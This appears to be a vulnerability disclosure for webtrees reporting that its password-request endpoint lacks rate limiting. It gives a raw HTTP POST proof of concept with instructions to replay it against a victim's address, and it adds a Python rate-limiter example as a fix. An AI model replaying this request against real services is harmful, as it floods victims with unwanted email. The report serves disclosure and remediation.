Insufficient Granularity of Access Control in fisharebest/webtrees
Valid
Reported on
Sep 29th 2021
Description
There is no rate-limit protection on the password-request endpoint, so an attacker can send an unlimited number of password-reset emails to a victim or to any other email address.
Proof of Concept
There is no rate limit on the password-request endpoint, so an attacker can send unlimited emails to a victim or to any email address.
POST /demo-stable/index.php?route=%2Fdemo-stable%2Fpassword-request%2Fdemo HTTP/1.1
Host: dev.webtrees.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://dev.webtrees.net
Connection: close
Cookie: __Secure-WT-ID=sdh1q5pp24lj80hqqkvqqauamg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_csrf=afa1QzzcSWAUPfgp1FOXBUWn14DtoVru&email=aravindtestx%40gmail.com
Set the email= parameter in the POST data to the victim's address. This request can be repeated an unlimited number of times, and the victim's email address will receive an unlimited number of verification emails.
Impact
An attacker can send unlimited emails to any mail address.
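As an added illustration of the missing control (not webtrees' own code, and written in Python rather than the project's PHP), a sliding-window limiter for a password-request handler that is keyed both by the requested address and by the source IP, so neither a single victim address nor a single client can trigger unbounded mail. The limits, addresses and window are constructed assumptions:

```python
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class PasswordRequestLimiter:
    # Constructed policy values (assumptions): at most 3 mails per address
    # and 10 requests per source IP within a 15-minute sliding window.
    per_email: int = 3
    per_ip: int = 10
    window_seconds: int = 900
    _email_hits: dict = field(default_factory=lambda: defaultdict(deque))
    _ip_hits: dict = field(default_factory=lambda: defaultdict(deque))

    @staticmethod
    def _prune(hits: deque, now: float, window: int) -> None:
        # Drop timestamps that have fallen out of the sliding window.
        while hits and now - hits[0] >= window:
            hits.popleft()

    def allow(self, email: str, ip: str, now: float) -> bool:
        """Return True if a reset mail may be sent for `email` from `ip` at time `now`."""
        key = email.strip().lower()  # case variants of one address share a bucket
        e_hits, ip_hits = self._email_hits[key], self._ip_hits[ip]
        self._prune(e_hits, now, self.window_seconds)
        self._prune(ip_hits, now, self.window_seconds)
        if len(e_hits) >= self.per_email or len(ip_hits) >= self.per_ip:
            return False  # over limit: log the attempt and skip sending
        e_hits.append(now)
        ip_hits.append(now)
        return True


def simulate(limiter: PasswordRequestLimiter, email: str, ip: str,
             count: int, start: float = 0.0) -> int:
    """Replay `count` requests one second apart; return how many mails would be sent."""
    return sum(limiter.allow(email, ip, start + i) for i in range(count))


if __name__ == "__main__":
    lim = PasswordRequestLimiter()
    # Constructed scenario: the PoC request replayed 50 times against one address.
    print(simulate(lim, "victim@example.com", "203.0.113.5", 50))  # 3
```

Without the limiter every one of the 50 replays would produce a mail; with it the address receives three and the rest are refused until the window expires.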
Occurrences
PasswordRequestAction.php#L22-L52